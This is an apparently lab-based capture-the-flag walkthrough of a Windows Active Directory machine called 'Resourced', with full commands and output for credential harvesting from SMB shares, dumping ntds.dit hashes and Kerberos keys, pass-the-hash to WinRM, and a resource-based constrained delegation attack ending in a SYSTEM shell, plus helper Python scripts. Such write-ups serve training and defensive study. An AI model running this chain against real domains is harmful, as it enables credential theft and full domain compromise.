# Resourced

`smb` `sam` `bloodhound`

* Machine name: Resourced
* Difficulty: Intermediate
* OS: Windows

## Enumeration

### NMAP

```
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-30 09:54 EDT
Nmap scan report for 192.168.163.175
Host is up (0.036s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-08-30 13:56:37Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: resourced.local0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-08-30T13:58:06+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=ResourceDC.resourced.local
| Not valid before: 2024-08-06T15:34:27
|_Not valid after:  2025-02-05T15:34:27
| rdp-ntlm-info: 
|   Target_Name: resourced
|   NetBIOS_Domain_Name: resourced
|   NetBIOS_Computer_Name: RESOURCEDC
|   DNS_Domain_Name: resourced.local
|   DNS_Computer_Name: ResourceDC.resourced.local
|   DNS_Tree_Name: resourced.local
|   Product_Version: 10.0.17763
|_  System_Time: 2024-08-30T13:57:26+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49712/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: RESOURCEDC; OS: Windows; CPE: cpe:/o:microsoft:windows
```

### SMB

```
┌──(kali㉿kali)-[~]
└─$ enum4linux 192.168.158.175
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sat Aug 31 05:03:02 2024

{...}
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant	Name: (null)	Desc: Linear Algebra and crypto god
index: 0xf73 RID: 0x458 acb: 0x00020010 Account: G.Goldberg	Name: (null)	Desc: Blockchain expert
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xf6d RID: 0x452 acb: 0x00020010 Account: J.Johnson	Name: (null)	Desc: Networking specialist
index: 0xf6b RID: 0x450 acb: 0x00020010 Account: K.Keen	Name: (null)	Desc: Frontend Developer
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt	Name: (null)	Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone	Name: (null)	Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason	Name: (null)	Desc: Ex IT admin
index: 0xf70 RID: 0x455 acb: 0x00020010 Account: P.Parker	Name: (null)	Desc: Backend Developer
index: 0xf71 RID: 0x456 acb: 0x00020010 Account: R.Robinson	Name: (null)	Desc: Database Admin
index: 0xf6f RID: 0x454 acb: 0x00020010 Account: S.Swanson	Name: (null)	Desc: Military Vet now cybersecurity specialist
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz	Name: (null)	Desc: New-hired, reminder: HotelCalifornia194!
{...}
```

That gives us a full list of domain users and, in V.Ventz's description field, a plaintext password: `HotelCalifornia194!`. The `description` attribute is readable by every authenticated user, and here enum4linux pulled it over an unauthenticated (null) SMB session, so it must never be used to park credentials. The account naming convention (first initial plus surname) is also worth noting for later username guessing.
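The enum4linux listing carries more than the one password: the `acb` field is the SAMR account-control bitmask, which tells you which accounts are disabled, have passwords that never expire, or do not require Kerberos pre-authentication. The script below is an added example (not part of the original page) that parses lines in that format, decodes the flags, and applies a simple heuristic to catch password-shaped tokens in descriptions. The sample input is a subset of the lines above with tabs replaced by spaces; the flag names follow MS-SAMR, and the secret heuristic is a home-grown rule of thumb, not something enum4linux does itself.

```python
"""Triage an enum4linux / samrdump user listing: decode the ACB flags and
flag descriptions that carry a credential. Added example, not from the page."""
import re

# MS-SAMR 2.2.1.12 USER_ACCOUNT codes worth knowing when triaging accounts
ACB_FLAGS = {
    0x00000001: "DISABLED",
    0x00000004: "PASSWD_NOT_REQUIRED",
    0x00000010: "NORMAL_ACCOUNT",
    0x00000080: "WORKSTATION_TRUST",
    0x00000200: "DONT_EXPIRE_PASSWORD",
    0x00000400: "AUTO_LOCKED",
    0x00002000: "TRUSTED_FOR_DELEGATION",
    0x00010000: "DONT_REQUIRE_PREAUTH",   # AS-REP roastable
    0x00020000: "PASSWORD_EXPIRED",
}

# One "index: ... RID: ... acb: ... Account: ... Name: ... Desc: ..." line
USER_LINE = re.compile(
    r"RID:\s*(?P<rid>0x[0-9a-fA-F]+)\s+acb:\s*(?P<acb>0x[0-9a-fA-F]+)\s+"
    r"Account:\s*(?P<account>\S+)\s+Name:\s*(?P<name>.*?)\s+Desc:\s*(?P<desc>.*)$"
)

# Words that often sit next to a password in a description field
KEYWORDS = re.compile(r"(?i)\b(pass(?:word|wd)?|pwd|reminder|cred(?:ential)?s?|secret|login)\b")

# Sample input: a subset of the enum4linux lines above, tabs replaced by spaces
SAMPLE = """\
index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator Name: (null) Desc: Built-in account for administering the computer/domain
index: 0xf72 RID: 0x457 acb: 0x00020010 Account: D.Durant Name: (null) Desc: Linear Algebra and crypto god
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest Name: (null) Desc: Built-in account for guest access to the computer/domain
index: 0xf10 RID: 0x1f6 acb: 0x00020011 Account: krbtgt Name: (null) Desc: Key Distribution Center Service Account
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: L.Livingstone Name: (null) Desc: SysAdmin
index: 0xf6a RID: 0x44f acb: 0x00020010 Account: M.Mason Name: (null) Desc: Ex IT admin
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: V.Ventz Name: (null) Desc: New-hired, reminder: HotelCalifornia194!
"""


def decode_acb(acb: int) -> list:
    """Names of the ACB bits set in the value enum4linux prints."""
    return [name for bit, name in ACB_FLAGS.items() if acb & bit]


def looks_like_secret(token: str) -> bool:
    """Heuristic: a password-shaped token is 8+ chars of mixed case with a digit and a symbol."""
    t = token.strip(".,;")
    return (len(t) >= 8
            and any(c.isdigit() for c in t)
            and any(c.isupper() for c in t)
            and any(c.islower() for c in t)
            and any(not c.isalnum() for c in t))


def parse_users(text: str) -> list:
    """One dict per user line: account, rid, decoded flags, description and findings."""
    users = []
    for line in text.splitlines():
        m = USER_LINE.search(line)
        if not m:
            continue
        acb = int(m["acb"], 16)
        desc = m["desc"].strip()
        users.append({
            "account": m["account"],
            "rid": int(m["rid"], 16),
            "acb": acb,
            "flags": decode_acb(acb),
            "desc": desc,
            "keyword_hit": bool(KEYWORDS.search(desc)),
            "secret_tokens": [t for t in desc.split() if looks_like_secret(t)],
        })
    return users


def leaked_credentials(users: list) -> list:
    """(account, [tokens]) for every description that carries a password-shaped token."""
    return [(u["account"], u["secret_tokens"]) for u in users if u["secret_tokens"]]


def enabled_users(users: list) -> list:
    """Accounts worth spraying: enabled and not machine accounts."""
    return [u["account"] for u in users
            if "DISABLED" not in u["flags"] and not u["account"].endswith("$")]


if __name__ == "__main__":
    users = parse_users(SAMPLE)
    for u in users:
        mark = " <-- credential in description" if u["secret_tokens"] else ""
        print(f'{u["account"]:<15} rid={u["rid"]:<5} {",".join(u["flags"])}{mark}')
    print("enabled:", ", ".join(enabled_users(users)))
```

On this box the decode shows that Administrator, L.Livingstone and V.Ventz have `DONT_EXPIRE_PASSWORD` set while the other user accounts are flagged `PASSWORD_EXPIRED`; none has `DONT_REQUIRE_PREAUTH`, so AS-REP roasting would be a dead end here.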

```
┌──(kali㉿kali)-[~]
└─$ smbmap -H 192.168.158.175 -u V.Ventz -p 'HotelCalifornia194!'

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 192.168.158.175:445	Name: 192.168.158.175     	Status: Authenticated
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	C$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	Password Audit                                    	READ ONLY	
	SYSVOL                                            	READ ONLY	Logon server share 
```

## Local exploitation

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ smbclient '//192.168.158.175/Password Audit' -U V.Ventz
Password for [WORKGROUP\V.Ventz]:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Oct  5 04:49:16 2021
  ..                                  D        0  Tue Oct  5 04:49:16 2021
  Active Directory                    D        0  Tue Oct  5 04:49:16 2021
  registry                            D        0  Tue Oct  5 04:49:16 2021

		7706623 blocks of size 4096. 2719140 blocks available
smb: \> cd "Active directory"
smb: \Active Directory\> dir
  .                                   D        0  Tue Oct  5 04:49:16 2021
  ..                                  D        0  Tue Oct  5 04:49:16 2021
  ntds.dit                            A 25165824  Mon Sep 27 07:30:54 2021
  ntds.jfm                            A    16384  Mon Sep 27 07:30:54 2021

		7706623 blocks of size 4096. 2719140 blocks available
smb: \Active directory\> mget *
Get file ntds.dit? yes
Get file ntds.jfm? yes
smb: \Active directory\> cd ..
smb: \> cd registry
smb: \registry\> dir
  .                                   D        0  Tue Oct  5 04:49:16 2021
  ..                                  D        0  Tue Oct  5 04:49:16 2021
  SECURITY                            A    65536  Mon Sep 27 06:45:20 2021
  SYSTEM                              A 16777216  Mon Sep 27 06:45:20 2021

		7706623 blocks of size 4096. 2719140 blocks available
smb: \registry\> mget *
Get file SECURITY? yes
Get file SYSTEM? yes
```

{% embed url="<https://www.thehacker.recipes/ad/movement/credentials/dumping/sam-and-lsa-secrets>" %}

### SECURITY

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ impacket-secretsdump -security SECURITY -system SYSTEM LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
$MACHINE.ACC:plain_password_hex:507fdb105d9322cf53420c95780adf5f2dcdac7ca14f8b37188370c916a3fa6f2a511bb284aeac71211c939a866a2b4cc02c408e1d242ad4f5cc8f7b85d2448c18d23fb47f7b9b543a6cfb8999e40037f23dbfd8690869753979d15fe61bdcddb0ccff3d20c275207ca93e844c3b5aa1f658198225b3e54f90e0b71aaf76ba32bb1b598d189b6696c27d04674fd4c4f2c09d0df2e59fe93850aa928be813be3bd659f0d2ecba6e34fb5a3880db8155cf77e21eb44d63e1ae65abcc2aa5bdfb6bfe85e8590329929522aae501ba86d8622918e37b41daef8a2b00e78440d13e88a31fc14714923bba6fb99e13c81b3020
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x85ec8dd0e44681d9dc3ed5f0c130005786daddbd
dpapi_userkey:0x22043071c1e87a14422996eda74f2c72535d4931
[*] NL$KM 
 0000   31 BF AC 76 98 3E CF 4A  FC BD AD 0F 17 0F 49 E7   1..v.>.J......I.
 0010   DA 65 A6 F9 C7 D4 FA 92  0E 5C 60 74 E6 67 BE A7   .e.......\`t.g..
 0020   88 14 9D 4D E5 A5 3A 63  E4 88 5A AC 37 C7 1B F9   ...M..:c..Z.7...
 0030   53 9C C1 D1 6F 63 6B D1  3F 77 F4 3A 32 54 DA AC   S...ock.?w.:2T..
NL$KM:31bfac76983ecf4afcbdad0f170f49e7da65a6f9c7d4fa920e5c6074e667bea788149d4de5a53a63e4885aac37c71bf9539cc1d16f636bd13f77f43a3254daac
[*] Cleaning up... 
```

### ntds.dit

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Target system bootKey: 0x6f961da31c7ffaf16683f78e04c3e03d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 9298735ba0d788c4fc05528650553f94
[*] Reading and decrypting hashes from ntds.dit 
Administrator:500:aad3b435b51404eeaad3b435b51404ee:12579b1666d4ac10f0f59f300776495f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
RESOURCEDC$:1000:aad3b435b51404eeaad3b435b51404ee:9ddb6f4d9d01fedeb4bccfb09df1b39d:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:3004b16f88664fbebfcb9ed272b0565b:::
M.Mason:1103:aad3b435b51404eeaad3b435b51404ee:3105e0f6af52aba8e11d19f27e487e45:::
K.Keen:1104:aad3b435b51404eeaad3b435b51404ee:204410cc5a7147cd52a04ddae6754b0c:::
L.Livingstone:1105:aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808:::
J.Johnson:1106:aad3b435b51404eeaad3b435b51404ee:3e028552b946cc4f282b72879f63b726:::
V.Ventz:1107:aad3b435b51404eeaad3b435b51404ee:913c144caea1c0a936fd1ccb46929d3c:::
S.Swanson:1108:aad3b435b51404eeaad3b435b51404ee:bd7c11a9021d2708eda561984f3c8939:::
P.Parker:1109:aad3b435b51404eeaad3b435b51404ee:980910b8fc2e4fe9d482123301dd19fe:::
R.Robinson:1110:aad3b435b51404eeaad3b435b51404ee:fea5a148c14cf51590456b2102b29fac:::
D.Durant:1111:aad3b435b51404eeaad3b435b51404ee:08aca8ed17a9eec9fac4acdcb4652c35:::
G.Goldberg:1112:aad3b435b51404eeaad3b435b51404ee:62e16d17c3015c47b4d513e65ca757a2:::
[*] Kerberos keys from ntds.dit 
Administrator:aes256-cts-hmac-sha1-96:73410f03554a21fb0421376de7f01d5fe401b8735d4aa9d480ac1c1cdd9dc0c8
Administrator:aes128-cts-hmac-sha1-96:b4fc11e40a842fff6825e93952630ba2
Administrator:des-cbc-md5:80861f1a80f1232f
RESOURCEDC$:aes256-cts-hmac-sha1-96:b97344a63d83f985698a420055aa8ab4194e3bef27b17a8f79c25d18a308b2a4
RESOURCEDC$:aes128-cts-hmac-sha1-96:27ea2c704e75c6d786cf7e8ca90e0a6a
RESOURCEDC$:des-cbc-md5:ab089e317a161cc1
krbtgt:aes256-cts-hmac-sha1-96:12b5d40410eb374b6b839ba6b59382cfbe2f66bd2e238c18d4fb409f4a8ac7c5
krbtgt:aes128-cts-hmac-sha1-96:3165b2a56efb5730cfd34f2df472631a
krbtgt:des-cbc-md5:f1b602194f3713f8
M.Mason:aes256-cts-hmac-sha1-96:21e5d6f67736d60430facb0d2d93c8f1ab02da0a4d4fe95cf51554422606cb04
M.Mason:aes128-cts-hmac-sha1-96:99d5ca7207ce4c406c811194890785b9
M.Mason:des-cbc-md5:268501b50e0bf47c
K.Keen:aes256-cts-hmac-sha1-96:9a6230a64b4fe7ca8cfd29f46d1e4e3484240859cfacd7f67310b40b8c43eb6f
K.Keen:aes128-cts-hmac-sha1-96:e767891c7f02fdf7c1d938b7835b0115
K.Keen:des-cbc-md5:572cce13b38ce6da
L.Livingstone:aes256-cts-hmac-sha1-96:cd8a547ac158c0116575b0b5e88c10aac57b1a2d42e2ae330669a89417db9e8f
L.Livingstone:aes128-cts-hmac-sha1-96:1dec73e935e57e4f431ac9010d7ce6f6
L.Livingstone:des-cbc-md5:bf01fb23d0e6d0ab
J.Johnson:aes256-cts-hmac-sha1-96:0452f421573ac15a0f23ade5ca0d6eada06ae85f0b7eb27fe54596e887c41bd6
J.Johnson:aes128-cts-hmac-sha1-96:c438ef912271dbbfc83ea65d6f5fb087
J.Johnson:des-cbc-md5:ea01d3d69d7c57f4
V.Ventz:aes256-cts-hmac-sha1-96:4951bb2bfbb0ffad425d4de2353307aa680ae05d7b22c3574c221da2cfb6d28c
V.Ventz:aes128-cts-hmac-sha1-96:ea815fe7c1112385423668bb17d3f51d
V.Ventz:des-cbc-md5:4af77a3d1cf7c480
S.Swanson:aes256-cts-hmac-sha1-96:8a5d49e4bfdb26b6fb1186ccc80950d01d51e11d3c2cda1635a0d3321efb0085
S.Swanson:aes128-cts-hmac-sha1-96:6c5699aaa888eb4ec2bf1f4b1d25ec4a
S.Swanson:des-cbc-md5:5d37583eae1f2f34
P.Parker:aes256-cts-hmac-sha1-96:e548797e7c4249ff38f5498771f6914ae54cf54ec8c69366d353ca8aaddd97cb
P.Parker:aes128-cts-hmac-sha1-96:e71c552013df33c9e42deb6e375f6230
P.Parker:des-cbc-md5:083b37079dcd764f
R.Robinson:aes256-cts-hmac-sha1-96:90ad0b9283a3661176121b6bf2424f7e2894079edcc13121fa0292ec5d3ddb5b
R.Robinson:aes128-cts-hmac-sha1-96:2210ad6b5ae14ce898cebd7f004d0bef
R.Robinson:des-cbc-md5:7051d568dfd0852f
D.Durant:aes256-cts-hmac-sha1-96:a105c3d5cc97fdc0551ea49fdadc281b733b3033300f4b518f965d9e9857f27a
D.Durant:aes128-cts-hmac-sha1-96:8a2b701764d6fdab7ca599cb455baea3
D.Durant:des-cbc-md5:376119bfcea815f8
G.Goldberg:aes256-cts-hmac-sha1-96:0d6ac3733668c6c0a2b32a3d10561b2fe790dab2c9085a12cf74c7be5aad9a91
G.Goldberg:aes128-cts-hmac-sha1-96:00f4d3e907818ce4ebe3e790d3e59bf7
G.Goldberg:des-cbc-md5:3e20fd1a25687673
[*] Cleaning up...
```

We put the usernames in `user.txt` and the corresponding NT hashes (the last 32-hex-character field of each `user:rid:lmhash:nthash:::` line) in `hashs.txt`, then sprayed them with pass-the-hash. The hit below comes from the WinRM module: `Pwn3d!` on port 5985 means L.Livingstone can open a remote PowerShell session with the hash alone, no cracking required.

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ crackmapexec winrm 192.168.158.175 -u user.txt -H hashs.txt -d resourced.local --continue-on-success
{...}
WINRM       192.168.158.175 5985   192.168.158.175  [+] resourced.local\L.Livingstone:19a3a7550ce8c505c2d46b5e39d6f808 (Pwn3d!)
{...}
```

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ evil-winrm -i 192.168.158.175 -u L.Livingstone -H '19a3a7550ce8c505c2d46b5e39d6f808'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\L.Livingstone\Documents> whoami
resourced\l.livingstone
```

## Privilege escalation

<figure><img src="https://2731053407-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F1RXsXNh9elYzxZgW8W8f%2Fuploads%2FVgb0UNn2e6H7H7grkuiJ%2Fb8fe482114ad4f4ed3507f93dc1bc11f.png?alt=media&#x26;token=2eb115d0-a539-4bb7-bab2-4ea3f5a2d3e4" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ bloodhound-python -u L.Livingstone --hashes 'aad3b435b51404eeaad3b435b51404ee:19a3a7550ce8c505c2d46b5e39d6f808' -d resourced.local -v --zip -c All -ns 192.168.158.175
```

We marked L.Livingstone as Owned, then selected the domain controller's computer node (ResourceDC.resourced.local) and kept enumerating. Under Inbound Control Rights, L.Livingstone has GenericAll over that computer object. GenericAll on a computer lets us write its msDS-AllowedToActOnBehalfOfOtherIdentity attribute, which is exactly the primitive needed for resource-based constrained delegation: any account we control that has an SPN can then impersonate domain users to services on the DC. We do not control such an account yet, so the first step is to create a machine account, which ms-DS-MachineAccountQuota (10 by default) lets any domain user do.

### Resource Based Constrained Delegation

{% embed url="<https://github.com/tothi/rbcd-attack/blob/master/rbcd.py>" %}

```
┌──(kali㉿kali)-[~/oscp/ress]
└─$ impacket-addcomputer resourced.local/l.livingstone -dc-ip 192.168.158.175 -hashes :19a3a7550ce8c505c2d46b5e39d6f808 -computer-name 'ATTACK$' -computer-pass 'AttackerPC1!'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account ATTACK$ with password AttackerPC1!.

┌──(kali㉿kali)-[~]
└─$ sudo python3 rbcd.py -dc-ip 192.168.158.175 -t RESOURCEDC -f 'ATTACK' -hashes :19a3a7550ce8c505c2d46b5e39d6f808 resourced\\l.livingstone
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Starting Resource Based Constrained Delegation Attack against RESOURCEDC$
[*] Initializing LDAP connection to 192.168.158.175
[*] Using resourced\l.livingstone account with password ***
[*] LDAP bind OK
[*] Initializing domainDumper()
[*] Initializing LDAPAttack()
[*] Writing SECURITY_DESCRIPTOR related to (fake) computer `ATTACK` into msDS-AllowedToActOnBehalfOfOtherIdentity of target computer `RESOURCEDC`
[*] Delegation rights modified succesfully!
[*] ATTACK$ can now impersonate users on RESOURCEDC$ via S4U2Proxy

┌──(kali㉿kali)-[~]
└─$ impacket-getST -spn cifs/resourcedc.resourced.local resourced/attack\$:'AttackerPC1!' -impersonate Administrator -dc-ip 192.168.158.175
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache

┌──(kali㉿kali)-[~]
└─$ export KRB5CCNAME=Administrator@cifs_resourcedc.resourced.local@RESOURCED.LOCAL.ccache
```

Add `resourcedc.resourced.local` to /etc/hosts, pointing at 192.168.158.175. With `-k`, psexec authenticates with the Kerberos service ticket we just obtained, and that ticket is bound to the SPN `cifs/resourcedc.resourced.local`; connecting by IP address would not match it.

```
┌──(kali㉿kali)-[~]
└─$ impacket-psexec -k -no-pass resourcedc.resourced.local -dc-ip 192.168.158.175
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Requesting shares on resourcedc.resourced.local.....
[*] Found writable share ADMIN$
[*] Uploading file wbKqIxpq.exe
[*] Opening SVCManager on resourcedc.resourced.local.....
[*] Creating service jEDp on resourcedc.resourced.local.....
[*] Starting service jEDp.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2145]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system
```
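The write that `rbcd.py` performs is a single LDAP modify of msDS-AllowedToActOnBehalfOfOtherIdentity on RESOURCEDC$, storing a self-relative security descriptor whose DACL grants the attacker's machine account. The example below is added here and is not part of the original page or of tothi's script: it builds that blob in pure Python and decodes it back, so you can see exactly what was written and, on the defensive side, audit the attribute on every computer object for SIDs that have no business being there. The domain SID and the RID of ATTACK$ are made up; the owner/group SID (BUILTIN\Administrators), the control flags and the 0x000F01FF access mask are, to the best of my knowledge, what the impacket-derived rbcd tooling uses, and the code does not depend on them being identical.

```python
"""Build and decode the msDS-AllowedToActOnBehalfOfOtherIdentity security
descriptor that an RBCD attack writes. Added example, not the page's code."""
import struct

SE_SELF_RELATIVE = 0x8000
SE_DACL_PRESENT = 0x0004
ACL_REVISION_DS = 4
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF           # mask used by the impacket-derived rbcd scripts
BUILTIN_ADMINS = "S-1-5-32-544"     # owner/group those scripts put in the descriptor

# Constructed SID: the domain SID and the RID of ATTACK$ are made up for this example
ATTACK_SID = "S-1-5-21-1111111111-2222222222-3333333333-1601"


def sid_to_bytes(sid: str) -> bytes:
    """Canonical S-1-... string to the binary SID layout (MS-DTYP 2.4.2.2)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: " + sid)
    authority = int(parts[2])
    subs = [int(x) for x in parts[3:]]
    return (struct.pack("<BB", 1, len(subs))
            + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))


def sid_from_bytes(buf: bytes, off: int):
    """Decode a binary SID at offset; returns (sid_string, consumed_bytes)."""
    rev, count = struct.unpack_from("<BB", buf, off)
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d" % (rev, authority) + "".join("-%d" % s for s in subs), 8 + 4 * count


def build_rbcd_sd(allowed_sids) -> bytes:
    """Self-relative SECURITY_DESCRIPTOR whose DACL grants each SID full control.
    Written to msDS-AllowedToActOnBehalfOfOtherIdentity, that is RBCD."""
    aces = b""
    for sid in allowed_sids:
        sid_b = sid_to_bytes(sid)
        # ACE header (type, flags, size) + access mask + SID
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), FULL_CONTROL) + sid_b
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(allowed_sids), 0) + aces
    owner = sid_to_bytes(BUILTIN_ADMINS)
    off_owner = 20                       # SECURITY_DESCRIPTOR header is 20 bytes
    off_group = off_owner + len(owner)
    off_dacl = off_group + len(owner)    # no SACL, so its offset stays 0
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         off_owner, off_group, 0, off_dacl)
    return header + owner + owner + acl


def allowed_to_act_sids(blob: bytes) -> list:
    """(sid, mask) for every ACCESS_ALLOWED ACE in the blob's DACL; [] if none or empty."""
    if len(blob) < 20:
        return []
    rev, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", blob, 0)
    if rev != 1 or not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", blob, off_dacl)
    out, off = [], off_dacl + 8
    for _ in range(ace_count):
        ace_type, _, ace_size, mask = struct.unpack_from("<BBHI", blob, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            out.append((sid_from_bytes(blob, off + 8)[0], mask))
        off += ace_size
    return out


def unexpected_delegations(blob: bytes, approved) -> list:
    """Defensive check: SIDs allowed to act on behalf of others that are not on the approved list."""
    return [sid for sid, _ in allowed_to_act_sids(blob) if sid not in approved]


if __name__ == "__main__":
    blob = build_rbcd_sd([ATTACK_SID])
    print(len(blob), "bytes:", blob.hex())
    print("allowed to act:", allowed_to_act_sids(blob))
    print("unexpected:", unexpected_delegations(blob, approved=set()))
```

Feeding a blob pulled from LDAP into `allowed_to_act_sids` is the check a defender wants to run over every computer object: on a DC that attribute should normally be empty, and any SID pointing at a freshly created machine account is a strong RBCD indicator. On the offensive side the same write is available in stock impacket as `impacket-rbcd -delegate-from 'ATTACK$' -delegate-to 'RESOURCEDC$' -action write`; when the engagement is over, undo it with `-action remove` and delete the machine account with `impacket-addcomputer ... -computer-name 'ATTACK$' -delete`.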
